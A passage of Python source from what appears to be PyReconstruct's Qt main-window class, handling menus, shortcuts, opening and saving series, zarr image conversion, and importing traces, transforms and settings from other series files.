self.ztrace_actions:\n a.setEnabled(False)\n # if selected trace in highlighted traces\n elif ((not context_menu and self.field.section.selected_traces) or\n (context_menu and clicked_trace in self.field.section.selected_traces)\n ):\n for a in self.ztrace_actions:\n a.setEnabled(False)\n for a in self.trace_actions:\n a.setEnabled(True)\n # if selected ztrace in highlighted ztraces\n elif ((not context_menu and self.field.section.selected_ztraces) or\n (context_menu and clicked_trace in self.field.section.selected_ztraces)\n ):\n for a in self.trace_actions:\n a.setEnabled(False)\n for a in self.ztrace_actions:\n a.setEnabled(True)\n else:\n for a in self.trace_actions:\n a.setEnabled(False)\n for a in self.ztrace_actions:\n a.setEnabled(False)\n \n # check for objects (to allow merging)\n names = set()\n for trace in self.field.section.selected_traces:\n names.add(trace.name)\n if len(names) > 1:\n self.mergeobjects_act.setEnabled(True)\n else:\n self.mergeobjects_act.setEnabled(False)\n\n # check labels\n if clicked_label:\n if clicked_label in self.field.zarr_layer.selected_ids:\n self.importlabels_act.setEnabled(True)\n if len(self.zarr_layer.selected_ids) > 1:\n self.mergelabels_act.setEnabled(True)\n else:\n self.importlabels_act.setEnabled(False)\n self.mergelabels_act.setEnabled(False)\n \n # MENUBAR\n\n # disable saving for welcome series\n is_not_welcome_series = not self.series.isWelcomeSeries()\n self.save_act.setEnabled(is_not_welcome_series)\n self.saveas_act.setEnabled(is_not_welcome_series)\n self.backup_act.setEnabled(is_not_welcome_series)\n\n # check for backup directory\n self.backup_act.setChecked(bool(self.series.options[\"backup_dir\"]))\n\n # check for palette\n self.togglepalette_act.setChecked(not self.mouse_palette.palette_hidden)\n self.toggleinc_act.setChecked(not self.mouse_palette.inc_hidden)\n self.togglebc_act.setChecked(not self.mouse_palette.bc_hidden)\n\n # undo/redo\n states = self.field.series_states[self.series.current_section]\n has_undo_states = bool(states.undo_states) or self.field.is_line_tracing\n has_redo_states = bool(states.redo_states)\n self.undo_act.setEnabled(has_undo_states)\n self.redo_act.setEnabled(has_redo_states)\n\n # check clipboard for paste options\n if self.field.clipboard:\n self.paste_act.setEnabled(True)\n else:\n self.paste_act.setEnabled(False)\n self.pasteattributes_act.setEnabled(False)\n\n # zarr images\n self.zarrimage_act.setEnabled(not self.field.section_layer.is_zarr_file)\n self.scalezarr_act.setEnabled(self.field.section_layer.is_zarr_file)\n\n # calibrate\n self.calibrate_act.setEnabled(bool(self.field.section.selected_traces))\n\n # zarr layer\n self.removezarrlayer_act.setEnabled(bool(self.series.zarr_overlay_fp))\n\n def createShortcuts(self):\n \"\"\"Create shortcuts that are NOT included in any menus.\"\"\"\n # domain translate motions\n shortcuts = [\n (\"Backspace\", self.backspace),\n\n (\"/\", self.flickerSections),\n\n (\"Ctrl+Left\", lambda : self.translate(\"left\", \"small\")),\n (\"Left\", lambda : self.translate(\"left\", \"med\")),\n (\"Shift+Left\", lambda : self.translate(\"left\", \"big\")),\n (\"Ctrl+Right\", lambda : self.translate(\"right\", \"small\")),\n (\"Right\", lambda : self.translate(\"right\", \"med\")),\n (\"Shift+Right\", lambda : self.translate(\"right\", \"big\")),\n (\"Ctrl+Up\", lambda : self.translate(\"up\", \"small\")),\n (\"Up\", lambda : self.translate(\"up\", \"med\")),\n (\"Shift+Up\", lambda : self.translate(\"up\", \"big\")),\n (\"Ctrl+Down\", lambda : self.translate(\"down\", \"small\")),\n (\"Down\", lambda : self.translate(\"down\", \"med\")),\n (\"Shift+Down\", lambda : self.translate(\"down\", \"big\")),\n\n (\"Ctrl+Shift+Left\", self.field.rotateTform),\n (\"Ctrl+Shift+Right\", lambda : self.field.rotateTform(cc=False))\n ]\n\n for kbd, act in shortcuts:\n QShortcut(QKeySequence(kbd), self).activated.connect(act)\n \n def createPaletteShortcuts(self):\n \"\"\"Create shortcuts associate with the mouse palette.\"\"\"\n # trace palette shortcuts (1-20)\n trace_shortcuts = []\n for i in range(1, 21):\n sc_str = \"\"\n if (i-1) // 10 > 0:\n sc_str += \"Shift+\"\n sc_str += str(i % 10)\n s_switch = (\n sc_str,\n lambda pos=i-1 : self.mouse_palette.activatePaletteButton(pos)\n )\n s_modify = (\n \"Ctrl+\" + sc_str,\n lambda pos=i-1 : self.mouse_palette.modifyPaletteButton(pos)\n )\n trace_shortcuts.append(s_switch)\n trace_shortcuts.append(s_modify)\n \n # mouse mode shortcuts (F1-F8)\n mode_shortcuts = [\n (\"p\", lambda : self.mouse_palette.activateModeButton(\"Pointer\")),\n (\"z\", lambda : self.mouse_palette.activateModeButton(\"Pan/Zoom\")),\n (\"k\", lambda : self.mouse_palette.activateModeButton(\"Knife\")),\n (\"c\", lambda : self.mouse_palette.activateModeButton(\"Closed Trace\")),\n (\"o\", lambda : self.mouse_palette.activateModeButton(\"Open Trace\")),\n (\"s\", lambda : self.mouse_palette.activateModeButton(\"Stamp\")),\n (\"g\", lambda : self.mouse_palette.activateModeButton(\"Grid\")),\n (\"f\", lambda : self.mouse_palette.activateModeButton(\"Flag\"))\n ]\n \n for kbd, act in (mode_shortcuts + trace_shortcuts):\n QShortcut(QKeySequence(kbd), self).activated.connect(act)\n \n def changeSrcDir(self, new_src_dir : str = None, notify=False):\n \"\"\"Open a series of dialogs to change the image source directory.\n \n Params:\n new_src_dir (str): the new image directory\n notify (bool): True if user is to be notified with a pop-up\n \"\"\"\n if notify:\n reply = QMessageBox.question(\n self,\n \"Images Not Found\",\n \"Images not found.\\nWould you like to locate them?\",\n QMessageBox.Yes,\n QMessageBox.No\n )\n if reply == QMessageBox.No:\n return\n if new_src_dir is None:\n new_src_dir = FileDialog.get(\n \"dir\",\n self,\n \"Select folder containing images\",\n )\n if not new_src_dir: return\n \n self.series.src_dir = new_src_dir\n if self.field:\n self.field.reloadImage()\n self.seriesModified(True)\n \n # prompt user to scale zarr images if not scaled\n if (self.field.section_layer.image_found and \n self.field.section_layer.is_zarr_file and\n not self.field.section_layer.is_scaled):\n reply = QMessageBox.question(\n self,\n \"Zarr Scaling\",\n \"Zarr file not scaled.\\nWould you like to update the zarr with scales?\",\n QMessageBox.Yes,\n QMessageBox.No\n )\n if reply == QMessageBox.Yes:\n self.srcToZarr(create_new=False)\n \n def srcToZarr(self, create_new=True):\n \"\"\"Convert the series images to zarr.\"\"\"\n if not self.field.section_layer.image_found:\n notify(\"Images not found.\")\n return\n \n if self.field.section_layer.is_zarr_file and create_new:\n notify(\"Images are already in zarr format.\")\n return\n elif not self.field.section_layer.is_zarr_file and not create_new:\n notify(\"Images are not in zarr format.\\nPlease convert to zarr first.\")\n return\n \n if create_new:\n zarr_fp = FileDialog.get(\n \"save\",\n self,\n \"Convert Images to Zarr\",\n file_name=f\"{self.series.name}_images.zarr\",\n filter=\"Zarr Directory (*.zarr)\"\n )\n if not zarr_fp: return\n\n python_bin = sys.executable\n zarr_converter = os.path.join(assets_dir, \"scripts\", \"convert_zarr\", \"start_process.py\")\n if create_new:\n convert_cmd = [python_bin, zarr_converter, self.series.src_dir, zarr_fp]\n else:\n convert_cmd = [python_bin, zarr_converter, self.series.src_dir]\n\n if os.name == 'nt':\n\n subprocess.Popen(convert_cmd, creationflags=subprocess.CREATE_NO_WINDOW)\n \n else:\n\n convert_cmd = \" \".join(convert_cmd)\n subprocess.Popen(convert_cmd, shell=True, stdout=None, stderr=None)\n\n def changeUsername(self, new_name : str = None):\n \"\"\"Edit the login name used to track history.\n \n Params:\n new_name (str): the new username\n \"\"\"\n if new_name is None:\n new_name, confirmed = QInputDialog.getText(\n self,\n \"Username\",\n \"Enter your username:\",\n text=QSettings(\"KHLab\", \"PyReconstruct\").value(\"username\", self.series.user),\n )\n if not confirmed or not new_name:\n return\n \n QSettings(\"KHLab\", \"PyReconstruct\").setValue(\"username\", new_name)\n self.user = new_name\n self.series.user = new_name\n \n def setFillOpacity(self, opacity : float = None):\n \"\"\"Set the opacity of the trace highlight.\n \n Params:\n opacity (float): the new fill opacity\n \"\"\"\n if opacity is None:\n opacity, confirmed = QInputDialog.getText(\n self,\n \"Fill Opacity\",\n \"Enter fill opacity (0-1):\",\n text=str(round(self.series.options[\"fill_opacity\"], 3))\n )\n if not confirmed:\n return\n \n try:\n opacity = float(opacity)\n except ValueError:\n return\n \n if not (0 <= opacity <= 1):\n return\n \n self.series.options[\"fill_opacity\"] = opacity\n self.field.generateView(generate_image=False)\n\n def openSeries(self, series_obj=None, jser_fp=None):\n \"\"\"Open an existing series and create the field.\n \n Params:\n series_obj (Series): the series object (optional)\n \"\"\"\n if not series_obj: # if series is not provided \n # get the new series\n new_series = None\n if not jser_fp:\n jser_fp = FileDialog.get(\"file\", self, \"Open Series\", filter=\"*.jser\")\n if not jser_fp: return # exit function if user does not provide series\n \n # user has opened an existing series\n if self.series:\n response = self.saveToJser(notify=True)\n if response == \"cancel\":\n return\n\n # check for a hidden series folder\n sdir = os.path.dirname(jser_fp)\n sname = os.path.basename(jser_fp)\n sname = sname[:sname.rfind(\".\")]\n hidden_series_dir = os.path.join(sdir, f\".{sname}\")\n\n if os.path.isdir(hidden_series_dir):\n # find the series and timer files\n new_series_fp = \"\"\n sections = {}\n for f in os.listdir(hidden_series_dir):\n # check if the series is currently being modified\n if \".\" not in f:\n current_time = round(time.time())\n time_diff = current_time - int(f)\n if time_diff <= 7: # the series is currently being operated on\n QMessageBox.information(\n self,\n \"Series In Use\",\n \"This series is already open in another window.\",\n QMessageBox.Ok\n )\n if not self.series:\n exit()\n else:\n return\n else:\n ext = f[f.rfind(\".\")+1:]\n if ext.isnumeric():\n sections[int(ext)] = f\n elif ext == \"ser\":\n new_series_fp = os.path.join(hidden_series_dir, f) \n\n # if a series file has been found\n if new_series_fp:\n # ask the user if they want to open the unsaved series\n open_unsaved = unsavedNotify()\n if open_unsaved:\n new_series = Series(new_series_fp, sections)\n new_series.modified = True\n new_series.jser_fp = jser_fp\n else:\n # remove the folder if not needed\n for f in os.listdir(hidden_series_dir):\n os.remove(os.path.join(hidden_series_dir, f))\n os.rmdir(hidden_series_dir)\n else:\n # remove the folder if no series file detected\n for f in os.listdir(hidden_series_dir):\n os.remove(os.path.join(hidden_series_dir, f))\n os.rmdir(hidden_series_dir)\n\n # open the JSER file if no unsaved series was opened\n if not new_series:\n new_series = Series.openJser(jser_fp)\n # user pressed cancel\n if new_series is None:\n if self.series is None:\n exit()\n else:\n return\n \n # clear the current series\n if self.series and not self.series.isWelcomeSeries():\n self.series.close()\n\n self.series = new_series\n\n # series has already been provided by other function\n else:\n self.series = series_obj\n \n # set the title of the main window\n self.seriesModified(self.series.modified)\n\n # set the explorer filepath\n if not self.series.isWelcomeSeries():\n settings = QSettings(\"KHLab\", \"PyReconstruct\")\n settings.setValue(\"last_folder\", os.path.dirname(self.series.jser_fp))\n\n # create field\n if self.field is not None: # close previous field widget\n self.field.createField(self.series)\n else:\n self.field = FieldWidget(self.series, self)\n self.setCentralWidget(self.field)\n\n # create mouse palette\n if self.mouse_palette: # close previous mouse dock\n self.mouse_palette.reset()\n else:\n self.mouse_palette = MousePalette(self)\n self.createPaletteShortcuts()\n palette_group, index = tuple(self.series.palette_index)\n self.changeTracingTrace(\n self.series.palette_traces[palette_group][index]\n ) # set the current trace\n\n # ensure that images are found\n if not self.field.section_layer.image_found:\n # check jser directory\n src_path = os.path.join(\n os.path.dirname(self.series.jser_fp),\n os.path.basename(self.field.section.src)\n )\n images_found = os.path.isfile(src_path)\n \n if images_found:\n self.changeSrcDir(src_path)\n else:\n self.changeSrcDir(notify=True)\n # prompt user to scale zarr images if not scaled\n elif (self.field.section_layer.image_found and \n self.field.section_layer.is_zarr_file and\n not self.field.section_layer.is_scaled):\n reply = QMessageBox.question(\n self,\n \"Zarr Scaling\",\n \"Zarr file not scaled.\\nWould you like to update the zarr with scales?\",\n QMessageBox.Yes,\n QMessageBox.No\n )\n if reply == QMessageBox.Yes:\n self.srcToZarr(create_new=False)\n \n # set the user for the series\n self.series.user = self.user\n \n def newSeries(\n self,\n image_locations : list = None,\n series_name : str = None,\n mag : float = None,\n thickness : float = None,\n from_zarr : bool = False\n ):\n \"\"\"Create a new series from a set of images.\n \n Params:\n image_locations (list): the filepaths for the section images.\n \"\"\"\n # get images from user\n if not image_locations:\n if from_zarr:\n valid_zarr = False\n while not valid_zarr:\n zarr_fp = FileDialog.get(\n \"dir\",\n self,\n \"Select Zarr\"\n )\n if not zarr_fp: return\n \n # get the image names in the zarr\n if \"scale_1\" in os.listdir(zarr_fp):\n valid_zarr = True\n image_locations = []\n for f in os.listdir(os.path.join(zarr_fp, \"scale_1\")):\n if not f.startswith(\".\"):\n image_locations.append(os.path.join(zarr_fp, \"scale_1\", f))\n else:\n notify(\"Please select a valid zarr file.\") \n else:\n image_locations = FileDialog.get(\n \"files\",\n self,\n \"Select Images\",\n filter=\"*.jpg *.jpeg *.png *.tif *.tiff *.bmp\"\n )\n if len(image_locations) == 0: return\n \n # get the name of the series from user\n if series_name is None:\n series_name, confirmed = QInputDialog.getText(\n self, \"New Series\", \"Enter series name:\")\n if not confirmed:\n return\n # get calibration (microns per pix) from user\n if mag is None:\n mag, confirmed = QInputDialog.getDouble(\n self, \"New Series\", \"Enter image calibration (μm/px):\",\n 0.00254, minValue=0.000001, decimals=6)\n if not confirmed:\n return\n # get section thickness (microns) from user\n if thickness is None:\n thickness, confirmed = QInputDialog.getDouble(\n self, \"New Series\", \"Enter section thickness (μm):\",\n 0.05, minValue=0.000001, decimals=6)\n if not confirmed:\n return\n \n # save and clear the existing backend series\n self.saveToJser(notify=True, close=True)\n \n # create new series\n series = Series.new(sorted(image_locations), series_name, mag, thickness)\n \n # open series after creating\n self.openSeries(series)\n\n # prompt the user to save the series\n self.saveAsToJser()\n \n def newFromXML(self, series_fp : str = None):\n \"\"\"Create a new series from a set of XML files.\n \n Params:\n series_fp (str): the filepath for the XML series\n \"\"\"\n\n # get xml series filepath from the user\n if not series_fp:\n series_fp = FileDialog.get(\n \"file\",\n self,\n \"Select XML Series\",\n filter=\"*.ser\"\n )\n if not series_fp: return # exit function if user does not provide series\n\n # save and clear the existing backend series\n self.saveToJser(notify=True, close=True)\n \n # convert the series\n series = xmlToJSON(os.path.dirname(series_fp))\n if not series:\n return\n\n # open the series\n self.openSeries(series)\n\n # prompt the user the save the series\n self.saveAsToJser()\n \n def exportToXML(self, export_fp : str = None):\n \"\"\"Export the current series to XML.\n \n Params:\n export_fp (str): the filepath for the XML .ser file\n \"\"\"\n # save the current data\n self.saveAllData()\n\n # get the new xml series filepath from the user\n if not export_fp:\n export_fp = FileDialog.get(\n \"save\",\n self,\n \"Export Series\",\n file_name=f\"{self.series.name}.ser\",\n filter=\"XML Series (*.ser)\"\n )\n if not export_fp: return False\n \n # convert the series\n jsonToXML(self.series, os.path.dirname(export_fp))\n \n def seriesModified(self, modified=True):\n \"\"\"Change the title of the window reflect modifications.\"\"\"\n # check for welcome series\n if self.series.isWelcomeSeries():\n self.setWindowTitle(\"PyReconstruct\")\n return\n \n if modified:\n self.setWindowTitle(self.series.name + \"*\")\n else:\n self.setWindowTitle(self.series.name)\n self.series.modified = modified\n \n def importTransforms(self, tforms_fp : str = None):\n \"\"\"Import transforms from a text file.\n \n Params:\n tforms_file (str): the filepath for the transforms file\n \"\"\"\n self.saveAllData()\n # get file from user\n if tforms_fp is None:\n tforms_fp = FileDialog.get(\n \"file\",\n self,\n \"Select file containing transforms\"\n )\n if not tforms_fp: return\n\n if not noUndoWarning():\n return\n \n # import the transforms\n importTransforms(self.series, tforms_fp)\n \n # reload the section\n self.field.reload()\n\n notify(\"Transforms imported successfully.\")\n\n def importSwiftTransforms(self, swift_fp=None):\n \"\"\"Import transforms from a text file.\n \n Params:\n swift_fp (str): the filepath for the transforms file\n \"\"\"\n\n self.saveAllData()\n \n # get file from user\n if not swift_fp:\n swift_fp = FileDialog.get(\"file\", self, \"Select SWiFT project file\")\n \n if not swift_fp:\n return\n\n # get scales from the swift project file\n with open(swift_fp, \"r\") as fp: swift_json = json.load(fp)\n\n scale_names = swift_json.get(\"level_data\")\n\n if scale_names: # new swift project file formatting\n \n scale_names = list(swift_json[\"level_data\"].keys())\n scales_available = [int(scale[1:]) for scale in scale_names]\n\n else: # old swift project file formatting\n\n scales_data = swift_json[\"data\"][\"scales\"]\n scale_names = list(scales_data.keys())\n scales_available = [int(scale[6:]) for scale in scale_names]\n\n scales_available.sort()\n \n print(f'Available SWiFT project scales: {scales_available}')\n\n structure = [\n [\"Scale:\", (True, \"combo\", [str(s) for s in scales_available])],\n [(\"check\", (\"Includes cal grid\", False))]\n ]\n\n response, confirmed = QuickDialog.get(self, structure, \"Import SWiFT Transforms\")\n if not confirmed:\n return\n scale = response[0]\n cal_grid = response[1][0][1]\n\n # import transforms\n print(f'Importing SWiFT transforms at scale {scale}...')\n if cal_grid: print('Cal grid included in series')\n importSwiftTransforms(self.series, swift_fp, scale, cal_grid)\n \n self.field.reload()\n\n notify(\"Transforms imported successfully.\")\n \n def importTraces(self, jser_fp : str = None):\n \"\"\"Import traces from another jser series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n if jser_fp is None:\n structure = [\n [\"Series:\", (True, \"file\", \"\", \"*.jser\")],\n [\"Object regex filters (separate with a comma and space):\"],\n [(\"text\", \"\")],\n [\n \"From section\",\n (\"int\", min(self.series.sections.keys())),\n \"to\",\n (\"int\", max(self.series.sections.keys()))\n ]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Import Traces\")\n if not confirmed:\n return\n \n jser_fp = response[0]\n if response[1]:\n regex_filters = response[1].split(\", \")\n else:\n regex_filters = []\n sections = tuple(range(response[2], response[3]+1))\n else:\n sections = self.series.sections.keys()\n regex_filters = []\n\n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the traces and close the other series\n self.series.importTraces(o_series, sections, regex_filters)\n o_series.close()\n\n # reload the field to update the traces\n self.field.reload()\n\n # refresh the object list if needed\n if self.field.obj_table_manager:\n self.field.obj_table_manager.refresh()\n else:\n self.series.data.refresh()\n \n notify(\"Traces imported successfully.\")\n \n def importZtraces(self, jser_fp : str = None):\n \"\"\"Import ztraces from another jser series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n regex_filters = []\n if jser_fp is None:\n structure = [\n [\"Series:\", (True, \"file\", \"\", \"*.jser\")],\n [\"Ztrace regex filters (separate with a comma and space):\"],\n [(\"text\", \"\")]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Import Ztraces\")\n if not confirmed:\n return\n jser_fp = response[0]\n if response[1]:\n regex_filters = response[1].split(\", \")\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the ztraces and close the other series\n self.series.importZtraces(o_series, regex_filters)\n o_series.close()\n\n # reload the field to update the ztraces\n self.field.reload()\n\n # refresh the ztrace list if needed\n if self.field.ztrace_table_manager:\n self.field.ztrace_table_manager.refresh()\n \n notify(\"Ztraces imported successfully.\")\n \n def importTracePalette(self, jser_fp : str = None):\n \"\"\"Import the trace palette from another series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n if jser_fp is None:\n jser_fp = FileDialog.get(\n \"file\",\n self,\n \"Select Series\",\n filter=\"*.jser\"\n )\n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the trace palette\n self.series.importPalettes(o_series)\n self.saveAllData()\n\n o_series.close()\n\n notify(\"Trace palette(s) imported successfully.\")\n \n def importSeriesTransforms(self, jser_fp : str = None):\n \"\"\"Import the trace palette from another series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n if jser_fp is None:\n jser_fp = FileDialog.get(\n \"file\",\n self,\n \"Select Series\",\n filter=\"*.jser\"\n )\n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # preliminary sections check\n self_sections = sorted(list(self.series.sections.keys()))\n other_sections = sorted(list(o_series.sections.keys()))\n if self_sections != other_sections:\n return\n \n # get a list of alignments from the other series\n o_alignments = list(o_series.data[\"sections\"][other_sections[0]][\"tforms\"].keys())\n s_alignments = list(self.series.data[\"sections\"][other_sections[0]][\"tforms\"].keys())\n\n # prompt the user to choose an alignment\n structure = [\n [(\n \"check\",\n *((a, False) for a in o_alignments)\n )]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Import Transforms\")\n if not confirmed:\n o_series.close()\n return\n \n chosen_alignments = [a for a, was_chosen in response[0] if was_chosen]\n if not chosen_alignments:\n o_series.close()\n return\n\n overlap_alignments = []\n for a in chosen_alignments:\n if a in s_alignments:\n overlap_alignments.append(a)\n \n if overlap_alignments:\n overlap_str = \", \".join(overlap_alignments)\n reply = QMessageBox.question(\n self,\n \"Import Alignments\",\n f\"The alignments {overlap_str} exist in your series.\\nWould you like to overwrite them?\",\n QMessageBox.Yes,\n QMessageBox.No\n )\n if reply == QMessageBox.No:\n notify(\"Import transforms canceled.\")\n o_series.close()\n return\n \n self.series.importTransforms(o_series, chosen_alignments)\n o_series.close()\n \n self.field.reload()\n self.seriesModified()\n\n notify(\"Transforms imported successfully.\")\n \n def importBC(self, jser_fp : str = None):\n \"\"\"Import the brightness/contrast settings from another jser series.\n \n Params:\n jser_fp (str): the filepath with the series to import data from\n \"\"\"\n sections = list(self.series.sections.keys())\n if jser_fp is None:\n structure = [\n [\"Series:\", (True, \"file\", \"\", \"*.jser\")],\n [\n \"From section\",\n (\"int\", min(self.series.sections.keys())),\n \"to\",\n (\"int\", max(self.series.sections.keys()))\n ]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Import Brightness/Contrast\")\n if not confirmed:\n return\n \n jser_fp = response[0]\n sections = tuple(range(response[1], response[2]+1))\n \n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the traces and close the other series\n self.series.importBC(o_series, sections)\n o_series.close()\n\n # reload the field to update the traces\n self.field.reload()\n\n # refresh the object list if needed\n if self.field.section_table_manager:\n self.field.section_table_manager.refresh()\n\n notify(\"Brightness/contrast settings imported successfully.\")\n \n def importFlags(self, jser_fp : str = None):\n \"\"\"Import flags from another series.\"\"\"\n if jser_fp is None:\n jser_fp = FileDialog.get(\n \"file\",\n self,\n \"Select Series\",\n filter=\"*.jser\"\n )\n if not jser_fp: return # exit function if user does not provide series\n\n self.saveAllData()\n\n if not noUndoWarning():\n return\n\n # open the other series\n o_series = Series.openJser(jser_fp)\n\n # import the flags\n self.series.importFlags(o_series)\n self.field.reload()\n\n o_series.close()\n\n notify(\"Flags imported successfully.\")\n \n def editImage(self, option : str, direction : str, log_event=True):\n \"\"\"Edit the brightness or contrast of the image.\n \n Params:\n option (str): brightness or contrast\n direction (str): up or down\n \"\"\"\n if option == \"brightness\" and direction == \"up\":\n self.field.changeBrightness(1)\n elif option == \"brightness\" and direction == \"down\":\n self.field.changeBrightness(-1)\n elif option == \"contrast\" and direction == \"up\":\n self.field.changeContrast(2)\n elif option == \"contrast\" and direction == \"down\":\n self.field.changeContrast(-2)\n self.mouse_palette.updateBC()\n \n def changeMouseMode(self, new_mode):\n \"\"\"Change the mouse mode of the field (pointer, panzoom, tracing...).\n\n Called when user clicks on mouse mode palette.\n\n Params:\n new_mode: the new mouse mode to set\n \"\"\"\n self.field.setMouseMode(new_mode)\n \n def changeClosedTraceMode(self, new_mode=None):\n \"\"\"Change the closed trace mode (trace, rectangle, circle).\"\"\"\n if new_mode not in [\"trace\", \"rect\", \"circle\"]:\n current_mode = self.field.closed_trace_mode\n structure = [\n [(\"radio\",\n (\"Trace\", current_mode == \"trace\"),\n (\"Rectangle\", current_mode == \"rect\"),\n (\"Ellipse\", current_mode == \"circle\")\n )],\n [(\"check\", (\"Automatically merge selected traces\", self.series.options[\"auto_merge\"]))]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"Closed Trace Mode\")\n if not confirmed:\n return\n \n if response[0][1][1]:\n new_mode = \"rect\"\n elif response[0][2][1]:\n new_mode = \"circle\"\n else:\n new_mode = \"trace\"\n \n self.series.options[\"auto_merge\"] = response[1][0][1]\n \n self.field.closed_trace_mode = new_mode\n\n def changeTracingTrace(self, trace):\n \"\"\"Change the trace utilized by the user.\n\n Called when user clicks on trace palette.\n\n Params:\n trace: the new tracing trace to set\n \"\"\"\n self.field.setTracingTrace(trace)\n \n def changeSection(self, section_num : int = None, save=True):\n \"\"\"Change the section of the field.\n \n Params:\n section_num (int): the section number to change to\n save (bool): saves data to files if True\n \"\"\"\n if section_num is None:\n section_num, confirmed = QInputDialog.getText(\n self, \"Go To Section\", \"Enter the desired section number:\", text=str(self.series.current_section))\n if not confirmed:\n return\n try:\n section_num = int(section_num)\n except ValueError:\n return\n \n # end the field pending events\n self.field.endPendingEvents()\n # save data\n if save:\n self.saveAllData()\n # change the field section\n self.field.changeSection(section_num)\n # update status bar\n self.field.updateStatusBar()\n # update the mouse palette\n self.mouse_palette.updateBC()\n \n def flickerSections(self):\n \"\"\"Switch between the current and b sections.\"\"\"\n if self.field.b_section:\n self.changeSection(self.field.b_section.n, save=False)\n \n def incrementSection(self, down=False):\n \"\"\"Increment the section number by one.\n \n Params:\n down (bool): the direction to move\n \"\"\"\n section_numbers = sorted(list(self.series.sections.keys())) # get list of all section numbers\n section_number_i = section_numbers.index(self.series.current_section) # get index of current section number in list\n if down:\n if section_number_i > 0:\n self.changeSection(section_numbers[section_number_i - 1]) \n else: \n if section_number_i < len(section_numbers) - 1:\n self.changeSection(section_numbers[section_number_i + 1]) \n \n def wheelEvent(self, event):\n \"\"\"Called when mouse scroll is used.\"\"\"\n # do nothing if middle button is clicked\n if self.field.mclick:\n return\n \n modifiers = QApplication.keyboardModifiers()\n\n # if zooming\n if modifiers == Qt.ControlModifier:\n self.activateWindow()\n field_cursor = self.field.cursor()\n p = self.field.mapFromGlobal(field_cursor.pos())\n x, y = p.x(), p.y()\n if not self.is_zooming:\n # check if user just started zooming in\n self.field.panzoomPress(x, y)\n self.zoom_factor = 1\n self.is_zooming = True\n\n if event.angleDelta().y() > 0: # if scroll up\n self.zoom_factor *= 1.1\n elif event.angleDelta().y() < 0: # if scroll down\n self.zoom_factor *= 0.9\n self.field.panzoomMove(zoom_factor=self.zoom_factor)\n \n # if changing sections\n elif modifiers == Qt.NoModifier:\n # check for the position of the mouse\n mouse_pos = event.point(0).pos()\n field_geom = self.field.geometry()\n if not field_geom.contains(mouse_pos.x(), mouse_pos.y()):\n return\n # change the section\n if event.angleDelta().y() > 0: # if scroll up\n self.incrementSection()\n elif event.angleDelta().y() < 0: # if scroll down\n self.incrementSection(down=True)\n \n def keyReleaseEvent(self, event):\n \"\"\"Overwritten: checks for Ctrl+Zoom.\"\"\"\n if self.is_zooming and event.key() == 16777249:\n self.field.panzoomRelease(zoom_factor=self.zoom_factor)\n self.is_zooming = False\n \n super().keyReleaseEvent(event)\n \n def saveAllData(self):\n \"\"\"Write current series and section data into backend JSON files.\"\"\"\n if self.series.isWelcomeSeries():\n return\n # # save the trace palette\n # self.series.palette_traces = []\n # for button in self.mouse_palette.palette_buttons: # get trace palette\n # self.series.palette_traces.append(button.trace)\n # if button.isChecked():\n # self.series.current_trace = button.trace\n self.field.section.save(update_series_data=False)\n self.series.save()\n \n def saveToJser(self, notify=False, close=False):\n \"\"\"Save all data to JSER file.\n \n Params:\n save_data (bool): True if series and section files in backend should be save\n close (bool): Deletes backend series if True\n \"\"\"\n # save the series data\n self.saveAllData()\n\n # if welcome series -> close without saving\n if self.series.isWelcomeSeries():\n return\n \n # notify the user and check if series was modified\n if notify and self.series.modified:\n save = saveNotify()\n if save == \"no\":\n if close:\n self.series.close()\n return\n elif save == \"cancel\":\n return \"cancel\"\n \n # check if the user is closing and the series was not modified\n if close and not self.series.modified:\n self.series.close()\n return\n\n # run save as if there is no jser filepath\n if not self.series.jser_fp:\n self.saveAsToJser(close=close)\n else: \n self.series.saveJser(close=close)\n \n # set the series to unmodified\n self.seriesModified(False)\n \n def saveAsToJser(self, close=False):\n \"\"\"Prompt the user to find a save location.\"\"\"\n # save the series data\n self.saveAllData()\n\n # check for wlecome series\n if self.series.isWelcomeSeries():\n return\n\n # get location from user\n new_jser_fp = FileDialog.get(\n \"save\",\n self,\n \"Save Series\",\n filter=\"*.jser\",\n file_name=f\"{self.series.name}.jser\"\n )\n if not new_jser_fp: return\n \n # move the working hidden folder to the new jser directory\n self.series.move(\n new_jser_fp,\n self.field.section,\n self.field.b_section\n )\n \n # save the file\n self.series.saveJser(close=close)\n\n # set the series to unmodified\n self.seriesModified(False)\n \n def autoBackup(self):\n \"\"\"Set up the auto-backup functionality for the series.\"\"\"\n # user checked the option\n if self.backup_act.isChecked():\n # prompt the user to find a folder to store backups\n new_dir = FileDialog.get(\n \"dir\",\n self,\n \"Select folder to contain backup files\",\n )\n if not new_dir:\n self.backup_act.setChecked(False)\n return\n self.series.options[\"backup_dir\"] = new_dir\n # user unchecked the option\n else:\n self.series.options[\"backup_dir\"] = \"\"\n \n self.seriesModified()\n \n def manualBackup(self):\n \"\"\"Back up the series to a specified location.\"\"\"\n self.saveAllData()\n d = datetime.now().strftime('%Y%m%d')\n series_basename = f\"{self.series.name}-{d}-{self.series.user}.jser\"\n\n backup_fp = FileDialog.get(\n \"save\",\n self,\n \"Backup Series\",\n file_name=series_basename,\n filter=\"Series file (*.jser)\"\n )\n if not backup_fp: return\n \n self.series.saveJser(save_fp=backup_fp)\n \n def viewSeriesHistory(self):\n \"\"\"View the history for the entire 